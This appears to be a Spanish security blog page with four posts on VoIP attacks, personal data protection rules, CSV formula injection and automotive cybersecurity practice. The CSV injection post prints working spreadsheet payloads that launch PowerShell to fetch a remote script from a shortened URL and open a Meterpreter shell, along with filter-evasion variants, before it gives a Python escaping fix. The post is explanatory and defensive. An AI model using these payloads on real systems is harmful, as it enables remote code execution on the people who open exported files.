Wednesday, 31 August 2016
DIFERENTES FORMAS DE ATACAR Y ASEGURAR LAS REDES TELEFÓNICAS DE VOIP
04:51
No comments
Las redes VoIP son vulnerables a muchas
formas de ataques comunes en las redes y los dispositivos compatibles con estas
infraestructuras también son vulnerables a problemas similares. Incluso si se
toman todas las precauciones de seguridad en redes informáticas,
el servidor sigue siendo susceptible a ataques. La seguridad en redes
informáticas está siempre en una batalla con la conveniencia. Soluciones de
seguridad en redes informáticas como escaneo de vulnerabilidades y otros que
hacen que los sistemas sean más seguros también los hacen menos convenientes.
Esperamos que este post te vaya a ayudar a darle sentido a prevenir la mayoría
de los ataques y mitigar la pérdida si por alguna razón, tu seguridad falla.
AQUÍ HAY
DIFERENTES MANERAS DE HACER EL ATAQUE DE VOIP:
SIP Escaneo y fuerza
bruta – las
violaciones de SIP escaneo y fuerza bruta se producen cuando los objetivos SIP
usando INVITE, REGISTER y OPTIONS, señalan mensajes para enumerar los nombres
de usuario SIP válidos con el objetivo de secuestrar ese dispositivo.
Los ataques TFTP – Los sistemas de infraestructura son la
columna vertebral de la comunicación de voz. Estos aparatos, ya sea hardware o
software, pueden ser atacados al igual que cualquier otra tecnología de TCP /
IP puede ser atacada. Por ejemplo, un vulnerable router de Cisco corriendo TFTP
no es muy diferente que un teléfono Cisco IP corriendo TFTP. Ambos dispositivos
son vulnerables a todos los ataques contra seguridad en redes informáticas que
caen bajo el ataque de TFTP.
Vulnerabilidades del
teléfono – La
vulnerabilidad del teléfono sigue siendo una de las maneras más fáciles para
los estafadores para obtener acceso a su red, pero también es una de las
contramedidas más fáciles utilizadas también. Independientemente de su
fabricante del teléfono, cualquier tipo de teléfono viene con problemas de
seguridad en redes informáticas. Un problema de seguridad es cuando el nombre
de usuario y contraseña por defecto de fábrica no se cambian. Esta es la forma
más sencilla para los estafadores para obtener de forma anónima el acceso a la
red según escaneo de vulnerabilidades.
Ataques de señalización – Session Initiation Protocol (SIP) se ha
convertido en el protocolo de control de llamadas para las redes VoIP, debido a
su naturaleza abierta y extensible. Sin embargo, la integridad de la señalización
entre los sitios de llamadas es de suma importancia y SIP es vulnerable a los
atacantes cuando se deja sin seguridad en redes informáticas. Secure SIP es un
mecanismo de seguridad definido por el RFC 3261 SIP para enviar mensajes SIP a
través de un canal cifrado. Los administradores de red no se ven en la
implementación de esta tecnología dentro de sus redes basadas en SIP y no hacen
escaneo de vulnerabilidades por lo tanto seguirá siendo insegura.
Vulnerabilidades de la
interfaz web PBX – Otras
áreas que desearas bloquear son PBX y las interfaces de administración, así
como acceso a una consola. Interfaces administrativas (tales como Webmin o
FreePBX / Trixbox GUI), así como el acceso directo de shell (SSH o Telnet) son
agujeros de seguridad en redes informáticas. La forma más fácil de manejar la
seguridad en redes informáticas es bloquear todos y cada uno fuera el tráfico
para llegar a ellos. Ya sea a través de firewall/ ACL depende de ti. Como
mínimo, se debe bloquear todo excepto las direcciones IP específicas con las
que manejes el sistema con frecuencia desde en una “lista de permitidos.”
Independientemente de si está o no está bloqueando estas interfaces, también
debe tener un nombre de usuario / contraseña segura para todo según expertos de
escaneo de vulnerabilidades quien trabajan en International Institute of Cyber
Security IICS.
User Extensions – Una de las formas más comunes de irrumpir
en un interruptor es también el más simple; es decir, atacando una user
Extensions en el sistema telefónico. El ‘hacker consigue de alguna manera el
nombre de usuario y la contraseña de un user/extension del interruptor y
comienza a enviar tráfico. La causa raíz más frecuente son contraseñas
inseguras. La gran cosa acerca de las contraseñas de usuario SIP es que usted
realmente debe sólo tiene que escribirla una vez (durante la configuración del
cliente). Lo mejor que puede hacer es utilizar un generador de contraseñas al
azar en línea o hacer escaneo de vulnerabilidades regularmente. El uso de las
contraseñas generadas aleatoriamente disminuye en gran medida la posibilidad de
que la contraseña sea “adivinada” ya sea por un ataque de fuerza bruta o
posible ataque de ingeniería social.
Hay algunos programas de escaneo de vulnerabilidades y sitios con programas que
permiten poner a prueba su seguridad en redes informáticas y los servidores SIP
disponibles en Internet. Estos pueden ayudarle a encontrar exactamente dónde
eres más vulnerable y ayudar a dirigir su atención cuando se trata de proteger
la red.
Una vez que se establece seguridad en redes informáticas, saber
lo que está pasando en tu red es la siguiente gran parte de la batalla. Por lo
menos, los informes diarios sobre el uso te darán una idea de lo que está
pasando y te ahorrará muchos dolores de cabeza en el futuro. Este informe de
escaneo de vulnerabilidades no tiene que ser granular, pero puede ser un
panorama que te guiará en la comprensión de tus vulnerabilidades de seguridad
en redes informáticas. La seguridad de VoIP definitivamente debe tener un
enfoque proactivo para tener éxito.
Monday, 29 August 2016
DIEZ REGLAS PARA LA PROTECCIÓN DE DATOS PERSONALES
01:05
No comments
Seguridad de datos personales es un tema muy importante para empresas. Las empresas siempre deben seguir reglas básicas para seguridad de datos personales.
1. CONSENTIMIENTO
Siempre que sea posible obtener el consentimiento antes de la
adquisición, posesión o el uso de datos personales. Según reglas de protección
de datos personales, cualquier formulario, ya sea en papel o basado en web,
quienes están diseñados para recopilar datos personales deben contener una
declaración explicando qué es la información que se utilizará para y quién
puede ser revelada.
2. DATOS CONFIDENCIALES
Tenga especial cuidado con los datos personales confidenciales
(es decir, información relacionada con la raza, opinión política, la salud
física o mental, las creencias religiosas, afiliación sindical, la sexualidad,
delitos, etc.). Acuerdo a recomendaciones de empresa de adaptación LOPD
International Institute of Cyber Security IICS, dicha información sólo debe
mantenerse y utilizarse cuando sea estrictamente necesario. Siempre obtener el
consentimiento de la persona en cuestión y notificarles de que existe uso
probable (s) de estos datos.
3. LOS DERECHOS INDIVIDUALES
Siempre que sea posible se abierto con las personas en relación
con la información que se llevan a cabo sobre ellos para asegurar protección de
datos personales. En la preparación de informes o de
agregar notas a los documentos oficiales, tenga en cuenta que los individuos
tienen el derecho de ver todos los datos personales y por lo tanto podrían leer
los comentarios ‘informales’ hechos por ellos. También tenga en cuenta que esto
incluye los correos electrónicos que contienen datos de carácter personal y así
mismo se debe tener precaución cuando se envían correos electrónicos.
4. LOS ARCHIVOS DE REVISIÓN
Sólo crear y conservar los datos personales cuando sea
absolutamente necesario ya que seguridad de datos personales es muy importante.
De forma segura disponer o eliminar cualquier dato personal que no esté
actualizado, irrelevantes o que no necesite. Acuerdo a recomendaciones deempresa de
adaptación LOPD deben
realizar exámenes regulares de los archivos y desechar los datos innecesarios u
obsoletos de forma sistemática.
5. ELIMINACIÓN DE LOS REGISTROS
Para mantener seguridad de dataos personales, cuando se deshaga
de los registros en papel que contienen datos personales, tratarlos con
confidencialidad (es decir desmenuza este tipo de archivos en lugar de disponer
de ellos como papel de desecho). Del mismo modo cualquiera innecesario o fuera
de la fecha de los documentos electrónicos deben suprimirse. Otro punto muy
crítico para protección de datos personales es que los equipos de negocios no
deben ser regalados o vendidos a menos que los servicios de información se han
asegurado de que toda la información almacenada en él se ha eliminado o
borrado.
6. PRECISIÓN
Mantenga todos los datos personales actualizados y precisos.
Tenga en cuenta los cambios de dirección y otras modificaciones. Si hay alguna
duda sobre la exactitud de los datos personales, entonces no deberían ser
utilizados explica experto de una empresa de adaptación LOPD.
7. SEGURIDAD
Mantenga todos los datos personales de forma segura como sea
posible (por ejemplo, en archivadores con llave o en habitaciones que se puede
bloquear cuando estén desocupadas). Para mantener seguridad de dataos
personales, no deje los registros que contengan datos de carácter personal sin
vigilancia en oficinas o áreas accesibles a los miembros del público. Asegúrese
de que los datos personales no se muestran en las pantallas de los ordenadores
visibles para los transeúntes. Tenga en cuenta que estas consideraciones de
seguridad también se aplican a los registros tomados fuera de la empresa, por
ejemplo, para el trabajo en casa o para una reunión fuera. También tener en
cuenta que el correo electrónico no es necesariamente confidencial para
protección de datos personales o asegurar así que no debe ser utilizado para
las comunicaciones potencialmente sensibles.
8. LA REVELACIÓN DE DATOS
Nunca revele datos personales a terceros sin el consentimiento
de la justificación razonable de otro individuo explica experto de una empresa
de adaptación LOPD. Esto incluye los padres, tutores, familiares y amigos de
los datos del sujeto quienes no tienen derecho a acceder a la información sin
el consentimiento del interesado. Los datos personales sólo pueden comunicarse
legítimamente a terceros para fines relacionados y para cumplir con los
requisitos legales de protección de datos personales, pero sólo en los que se
conforman con las solicitudes de información de identidad ‘y la legitimidad de
la solicitud.
Las solicitudes de información personal se reciben de vez en
cuando de organizaciones tales como la policía y el gobierno. Las empresas
deben esforzarse por cooperar con estas organizaciones, pero los primeros pasos
se deben tomar son asegurarse de que las solicitudes son genuinas y legítimas.
9. TRANSFERENCIA DE TODO EL MUNDO
Siempre debes obtener el consentimiento de la persona de que se
trate antes de colocar la información sobre ellos en Internet (aparte de los
detalles básicos del contacto de oficina) y antes de enviar cualquier
información personal fuera del país acuerdo a recomendaciones de
iicybersecurity, una empresa de adaptación LOPD.
10. PROCESADORES TERCEROS
Tenga en cuenta que si está utilizando un procesador de datos,
por ejemplo, a un tercer partido para gestión de base de datos y se les da
acceso a los datos personales, entonces usted debe tener un contrato escrito en
marcha con ellos para garantizar que ellos tratan a dicha información con
confidencialidad, tienen medidas de seguridad de datos personales y en
cumplimiento de la ley de protección de datos personales.
Podrían aprender más sobre protección de datos personales,
medidas de seguridad de datos personales con ayuda de expertos de empresas de
adaptación LOPD.
Saturday, 27 August 2016
¿CÓMO MITIGAR UN ATAQUE DE INYECCIÓN CSV?
03:13
No comments
Los expertos de seguridad web mencionan que
un atacante puede explotar esta funcionalidad mediante la inserción de
caracteres arbitrarios en formas que sean exportables (sea esto a través de un
análisis, contactos u otras funcionalidades). Permitiendo en consecuencia, a
dicho atacante pueda formular una carga útil de ataque que se ejecuta cuando
dicho archivo CSV se descarga y podría romper seguridad perimetral.
El escenario de este ataque se dirige puramente al usuario
(s) que descarga el archivo CSV, naturalmente, este ataque de seguridad web se
suele descartar como un problema sin embargo sitios web todavía deben estar al
tanto de la información que están exportando porque puede ser potencialmente
perjudicial para seguridad perimetral de los usuarios.
El playload más común visto es similar a la que se muestra a
continuación:
=cmd|’ /C
calc’!A0
Esta cadena en su núcleo, le está diciendo esencialmente al programa
que está abierto con el programa que le gustaría ejecutar cmd.exe con las
siguientes banderas /C calc que a su vez pondrán en marcha calc.exe desde la
línea de comandos.
Para formular un payload meterpreter en la víctima, hemos
adaptado una cadena de payload para que sea más corto y más fácil de inyectar,
como resultado, el siguiente payload se puede utilizar
=cmd|'/C powershell IEX(wget 0r.pe/p)'!A0
Donde en este caso url cortado 0r.pe es utilizado para entregar
el payload para no ser detectado por seguridad perimetral(Invoke-Shellcode) que
es una función de Powersploit para permitir la entrega de meterpreteshells.
Para acortar el payload aún más la siguiente cadena también se puede utilizar,
que corta la necesidad de la cadena de cmd.
=powershell|'IEX(wget 0r.pe/p)'!A0
Esto directamente lanzará PowerShell desde la célula afectada en
editor de hojas de cálculo de su elección. Estos payloads están todos muy bien
y bien sin embargo, la mayoría de las veces que no he estado viendo el =
carácter está siendo filtrado hacia fuera menciona experto de seguridad web de iicybersecurity
IICS.
Sin embargo, utilizando el conocimiento personal Microsoft Excel
y seguridad web, también es posible intact el payload usando otras
combinaciones de caracteres tales como @, + o – en una variedad de diferentes
combinaciones.
@SUM(1+1)*cmd|’
/C calc’!A0
O para cuantificar el peligro:
@SUM(1+1)*cmd|' powershell IEX(wget 0r.pe/p)'!A0
Una vez dicho todo esto y hablado de los diversos payloads hay
pasos de mitigación que se pueden tomar para eliminar más o menos la amenaza de
secuencias de comandos PowerShell que infestan el sistema de un usuario con
shells acuerdo a los expertos de seguridad web de International Institute of
Cyber Security.
PASOS PARA LA
MITIGACIÓN
Las medidas recomendadas para remediar este problema de
seguridad web se han descrito anteriormente sería asegurar que las formulario
que se pueden exportar si contengan únicamente caracteres alfanuméricos y no
puedan ser modificados para añadir caracteres arbitrarios.
También se debe considerar que todas las entradas de los
usuarios no pueden ser de confianza y como resultado cualquier salida
debe ser codificada. La salida de esta funcionalidad se debe asumir como texto
y no fórmulas. Lo que podrían adoptarse medidas para designar fácilmente como
tal al colocar las cotizaciones en todo el texto o la aplicación de
características de escape como se describe y se demuestra a continuación según
curso de seguridad perimetral.
El problema con los vectores de inyección CSV discutidos arriba
no tiene en realidad que ver con el carácter @, o =, +, -. El problema radica
en el carácter pipe (|), el cual Excel y otras aplicaciones interpretan para
ejecutar comandos {arbitrarios} y windows lanza binarios. De la lectura de los
ataques de seguridad web y la investigación de las posibles técnicas de
mitigación con ayuda de expertos de seguridad perimetral que la mejor solución
es escapar del carácter pipe en este escenario de ataque es poner un prefijo \
antes del pipe. Esto se debe a que Excel y otros programas que buscan un
ejecutable llamado cmd.exe o powershell.exe sin embargo, cuando añadiendo
un \ dentro de la trayectoria evitará el lanzamiento de exe.
Además también hemos escrito un script en Python para escapar de
archivos CSV que se pueden ver a continuación, es una prueba rápida del
concepto sin embargo se puede adaptar fácilmente:
def
escape(payload):
if payload[0] in (‘@’,’+’,’-‘, ‘=’,
‘|’):
payload = payload.replace(“|”,
“\|”)
payload = “‘” + payload +
“‘”
return payload
# An example
of payload string payload
= “@cmd|’ /C
calc’!A0”
print “The
Unescaped version is: ” + payload
print “When
passed though escape function the value is: ” +
escape(payload)
En el código anterior se puede observar que si una cadena de
payload contiene cualquiera de los caracteres en la lista negra se han evitado
el ataque, esto se demuestra en la salida del script:
root@zsec:#
python escape_csv.py
El
version Unescaped es:
“@cmd|’ /C
calc’!A0”
When passed
though escape function the value is: ‘@cmd\|’ /C calc’!A0′
Note que desde la salida se puede ver que la versión escapada
tiene un conjunto de’ alrededor de la cadena de usuario y el carácter pipe
también se ha escapado. Cabe señalar que los problemas descritos anteriormente
son sólo un tipo de ataque de inyección CSV, esta mitigación no cubre los
ataques sobre seguridad web que se pueden llevar a cabo utilizando la misma
técnica pero con diferentes payloads.
Wednesday, 24 August 2016
MEJORES PRÁCTICAS DE CIBERSEGURIDAD PARA LA INDUSTRIA AUTOMOTRIZ
05:20
No comments
Hay diferentes áreas donde empresas de
industria automotriz debe enfocar para no tener problemas con ciberseguridad.
Este artículo explica las mejores prácticas en diferente área para la industria
automotriz
GOBERNACIÓN
La gobernación efectiva se alinea a un programa de soluciones de ciberseguridad de vehículos con la misión y objetivos
de una organización. Por otro lado, un sólido gobernación puede ayudar a
fomentar y mantener una cultura de ciberseguridad. Las mejores prácticas no
dictan un modelo particular de gobernación de soluciones de ciberseguridad de
vehículos, pero proporcionan consideraciones para el diseño para alinear las
funciones y responsabilidades funcionales. Mejores prácticas para la
gobernación incluyen:
§ Definir
la supervisión ejecutiva de la seguridad del producto con ayuda de empresa de
ciberseguridad.
§ Alinear
la empresa para abordar la ciberseguridad de vehículos, con funciones y
responsabilidades definidas en el conjunto de la organización con ayuda de
servicios de ciberseguridad.
§ Comunicar
la responsabilidad de supervisar los servicios de ciberseguridad a todos los
grupos de interés internos apropiados.
§ Dedicar
recursos adecuados para las actividades y curso de ciberseguridad en toda la
empresa.
§ Establecer
procesos de gobernación para garantizar el cumplimiento de las regulaciones,
políticas internas, y los compromisos externos.
EVALUACIÓN Y
GESTIÓN DE RIESGOS
Evaluación del riesgo y estrategias de gestión para mitigar el
impacto potencial de las vulnerabilidades de la ciberseguridad. Según expertos
de soluciones de ciberseguridad, las mejores prácticas se centran en los
procesos de identificación, categorización, priorización y el tratamiento de
los riesgos de ciberseguridad que podrían llegar a problemas de seguridad y
protección de datos. Los procesos de gestión de riesgos y servicios de
ciberseguridad pueden ayudar a los fabricantes de automóviles a identificar y
proteger los bienes críticos, ayudar en el desarrollo de medidas de protección,
y apoyar las decisiones de riesgo operacional. Acuerdo acurso de ciberseguridad,
mejores prácticas para la evaluación y gestión de riesgos incluyen:
§ Con
ayuda de una empresa de ciberseguridad, establecer procesos estandarizados para
identificar, medir, y dar prioridad a las fuentes de riesgo de ciberseguridad.
§ Establecer
un proceso de decisión para gestionar los riesgos identificados.
§ Documentar
de un proceso para informar y comunicar los riesgos a las partes interesadas
apropiadas.
§ Monitorear
y evaluar los cambios en los riesgos identificados como parte de un circuito de
retroalimentación de evaluación de riesgos.
§ Incluir
la cadena de suministro en las evaluaciones de riesgo y servicios de
ciberseguridad.
§ Establecer
un proceso para confirmar el cumplimiento de los proveedores críticos para
verificar los requisitos de ciberseguridad, líneas de guía y curso de
ciberseguridad.
§ Incluir
una evaluación de riesgos en la etapa inicial de desarrollo del vehículo, y
volver a evaluar en cada etapa del ciclo de vida del vehículo; explican
maestros de iicybersecurity, una escuela de ciberseguridad.
SEGURIDAD EN
DISEÑO
El diseño del vehículo seguro consiste en la integración de los
recursos de hardware y soluciones de de ciberseguridad durante el proceso de
desarrollo de productos. Según expertos de empresa de ciberseguridad, las
mejores prácticas para la seguridad en diseño incluyen:
§ Considerar
los riesgos de ciberseguridad desde el principio y en las etapas clave en el
proceso de diseño.
§ Identificar
y abordar las amenazas potenciales y objetivos de ataque en el proceso de
diseño.
§ Usar
servicios de ciberseguridad para considerar y comprender los métodos apropiados
de reducción de la superficie de ataque.
§ Aprender
implementar capas de defensas de ciberseguridad con curso de ciberseguridad
para lograr una defensa en profundidad.
§ Identificar
los límites de confianza y protegerlos mediante los controles de seguridad.
§ Incluir
las revisiones de diseño de seguridad en el proceso de desarrollo.
§ Implementar
las conexiones seguras hacía, desde y dentro del vehículo.
§ Limitar
interacciones en la red con ayuda de separación de ambientes.
§ Según
profesores de escuela de ciberseguridad es muy importante hacer pruebas de
hardware y software para evaluar la integridad del producto y la seguridad como
parte de las pruebas de componentes.
§ Tomar
ayuda de expertos de una empresa de ciberseguridad para Llevar a cabo las
pruebas de vulnerabilidad a nivel de software, incluyendo pruebas de unidad e
integración.
§ Probar
y validar soluciones de ciberseguridad implementado al nivel del vehículo.
§ Autenticar
y validar todas las actualizaciones de software, independientemente del método
de actualización.
§ Considere
la posibilidad de riesgos contra privacidad de datos de acuerdo con los
principios de protección de privacidad del consumidor.
DETECCIÓN DE
AMENAZAS Y PROTECCIÓN
Ciberseguridad proactiva a través de la detección de amenazas,
vulnerabilidades e incidentes permiten a los fabricantes de automóviles mitigar
el riesgo y consecuencias asociadas. Los procesos de detección de amenazas
crear conciencia de actividades sospechosas, lo que permite actividades de
rehabilitación y recuperación proactivas. Según profesores de escuela de
ciberseguridad, las mejores prácticas para la detección de amenazas y
protección incluyen:
§ Según
curso de ciberseguridad deben evaluar el riesgo y la disposición de las
amenazas identificadas y las vulnerabilidades utilizando un proceso definido de
conformidad con los procedimientos generales de gestión de riesgos.
§ Informar
las decisiones basadas en el riesgo con la supervisión de las amenazas para
reducir el riesgo de la empresa entendiendo y anticipando las amenazas actuales
y emergentes.
§ Tomar
ayuda de empresa de ciberseguridad para identificar las amenazas y
vulnerabilidades a través de diversos medios, incluyendo la exploración y
análisis de rutina de las áreas de mayor riesgo.
§ Apoyar
la detección de anomalías para sistemas de operaciones, servicios de vehículos,
y otras funciones conectadas, con consideraciones de privacidad.
§ La
organización debe tener proceso para gestiona de la divulgación de
vulnerabilidades de partes externas.
§ Usar
servicios de ciberseguridad para informar sobre las amenazas y las
vulnerabilidades a terceros.
RESPUESTA A
INCIDENTES Y RECUPERACIÓN
Un plan de respuesta a incidentes documenta los procesos para
informar a una respuesta a incidentes ciberseguridad que afecten el ecosistema
del vehículo. Los expertos de soluciones de ciberseguridad mencionan que las
mejores prácticas incluyen protocolos para recuperarse de incidentes de
ciberseguridad de una manera fiable y rápida, y la manera de garantizar el
mejoramiento del proceso de continuo. Según empresa de ciberseguridad, las
mejores prácticas para la respuesta a incidentes y recuperación incluyen:
§ Documentar
el ciclo de vida de respuesta a incidentes, desde la identificación y
contención a través de la rehabilitación y la recuperación.
§ Asegurar
que un equipo de respuesta de incidentes este en su lugar para coordinar una
respuesta de toda la empresa a un incidente cibernético al vehículo.
§ Mantener
actualizado con curso de ciberseguridad y realizar pruebas y simulaciones de
incidentes periódicamente para promover la preparación del equipo de respuesta
a incidentes.
§ Tomar
ayuda de servicios de ciberseguridad para identificar y validar en qué parte
del vehículo un incidente se originó.
§ Determinar
el impacto real y potencial de incidente cibernético al armada del vehículo.
§ Contener
un incidente para eliminar o disminuir su gravedad.
§ Promover
medidas oportunas y apropiadas para remediar un incidente cibernético vehículo.
§ Notificar
a los interesados internos y externos de un incidente cibernético del vehículo.
§ Según
profesores de escuela de ciberseguridad, mejorar los planes de respuesta a
incidentes en el tiempo sobre la base de las lecciones aprendidas es muy
importante.
FORMACIÓN Y
SENSIBILIZACIÓN
Los programas de una escuela de ciberseguridad y curso de
ciberseguridad ayudan a cultivar una cultura de seguridad y hacer cumplir las
responsabilidades de seguridad cibernética del vehículo. Según empresa de
ciberseguridad, las mejores prácticas deben incluir los programas de formación
y de sensibilización en toda la organización para fortalecer el entendimiento
de las partes interesadas de los riesgos de ciberseguridad. Según expertos de
soluciones de ciberseguridad, las mejores prácticas de formación y sensibilización
incluyen:
§ Establecer
programas de curso de ciberseguridad para los interesados internos en todo el
ecosistema del vehículo.
§ Incluir
servicios de ciberseguridad y la conciencia de ciberseguridad específica para
el vehículo.
§ Educar
a los empleados en la conciencia de la ciberseguridad, las funciones y
responsabilidades con ayuda de una escuela de ciberseguridad.
LA COLABORACIÓN CON TERCEROS
La defensa contra los ataques cibernéticos a menudo requiere de
la colaboración entre múltiples partes interesadas para mejorar la conciencia
sobre las amenazas cibernéticas, servicios de ciberseguridad y la respuesta a
ataque cibernético. Según expertos de servicios de ciberseguridad,
las mejores prácticas para la colaboración y el compromiso con Terceros
incluyen:
§ Revisar
la información y los datos mediante un proceso de clasificación estandarizado
antes de la cesión a terceros.
§ Interactuar
con organismos de la industria, tales como empresa de ciberseguridad,
Auto-ISAC, Auto Alliance, los fabricantes de automóviles globales, y otros.
§ Interactuar
con los organismos gubernamentales, incluyendo el National Highway Traffic
Safety Administration, NIST, Department of Homeland Security, United States
Computer Emergency Readiness Team, Federal Bureau of Investigation y otros.
§ Participar
con las instituciones académicas como International Institute of Cyber
Security,una escuela de ciberseguridad y los investigadores de soluciones de
ciberseguridad, que sirven como un recurso adicional en la identificación y
mitigación de amenazas.
§ Formar
alianzas y acuerdos de colaboración para mejorar la ciberseguridad del
vehículo.